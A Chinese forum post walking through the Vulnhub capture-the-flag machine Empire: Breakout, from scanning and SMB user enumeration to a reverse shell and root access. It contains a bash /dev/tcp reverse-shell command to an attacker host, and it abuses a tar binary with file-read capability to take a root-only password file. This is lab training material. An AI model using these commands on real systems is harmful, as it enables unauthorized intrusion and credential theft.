回答

收藏

Vulnhub 靶机篇:Empire Breakout

HG021B HG021B 10797 人阅读 | 0 人回复 | 2024-04-08

0x01 靶机信息

  • 名称:Empire:Breakout
  • 发布日期:2021 年 10 月 21 日
  • 作者:icex64 & Empire Cybersecurity
  • 系列:Empire
  • 难度:简易
  • 简介:这个盒子被设计成一个简单的盒子,但如果你迷路了,它也可以是中等的。
  • 下载链接https://download.vulnhub.com/empire/02-Breakout.zip
  • MD5:C87BC1DB9BD51205B1E9EA441F8222AB
  • 网络:DHCP自动分配

0x02 Write-Up

2.1 主机扫描

nbtscan -r 192.168.181.0/24

扫描到目标ip:192.168.181.141

index.png

2.2 扫描目标服务端口

amap -Aq 192.168.181.141 1-65535
-A 启用主机发现和操作系统版本检测功能,-q 不返回失败信息

发现目标机开放了80,10000,20000,139,445端口

对应开放的服务:http,smb,mysql

index-1.png

2.3 访问网站

80端口是服务器默认页面

index-2.png

访问10000端口,提示用https

index-3.png

10000端口是一个管理平台登录页面

index-4.png

20000端口同理https访问,也是一个管理页面

index-5.png

观察index.html默认页面

index-6.png

查看源代码,发现了一条密文

index-7.png

don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
翻译:不用担心没有人会到达这里,与您分享我的访问权限是安全的。它是加密的:)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

将这段brainfuck加密的密文解密

index-8.png

.2uqPEfj3D<P'a-3

根据之前源代码中提到的分享权限,可以判断这是一个访问权限的密码

我们还差一个用户名,可以利用开放的smb服务尝试扫描

2.4 enum4linux 扫描smb服务

enum4linux -Ur 192.168.181.141
-U 列举用户,-r RID循环枚举用户

得到用户名cyber

index-9.png

利用用户cyber,密码.2uqPEfj3D<P'a-3登录

index-10.png

登录失败

index-11.png

尝试20000端口的管理页面,登录成功

在页面下方发现了终端图标

index-12.png

获得终端

index-13.png

2.5 反弹shell

nc -lvvp 4444
kali开启侦听4444端口

index-14.png

目标机反弹shell

bash -i >& /dev/tcp/192.168.181.136/4444 0>&1

index-15.png

查看目录,发现user.txt文件

index-16.png

3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
翻译:你设法破坏了我的安全访问

这是cyber用户的flag

查看目录下文件权限,发现可执行文件tar,用getcap进一步查看权限

getcap tar
查看文件的capabilities(能力)

查看后发现文件拥有CAP_DAC_READ_SEARCH(忽略文件读及目录搜索的DAC访问限制)

意思是我们可以用tar来获取读取权限

index-17.png

查找敏感文件

find / -name "*pass*" 2>/dev/null

在/var/backups目录下发现.old_pass.bak文件

index-18.png

只有root用户有权限

index-19.png

2.6 利用tar命令的功能属性读取文件

./tar -cf passwd.tar /var/backups/.old_pass.bak
./tar利用家目录那个有权的tar命令执行,-c创建,-f指定文件

tar -xf passwd.tar
-x 解压,-f 指定文件

index-20.png

发现密码Ts&4&YurgtRX(=~h

index-21.png

2.7 提权

利用获取的密码登录root

index-22.png

成功获取最终flag

3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}
翻译:恭喜你成功逃离我的系统
分享到:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

145 积分
17 主题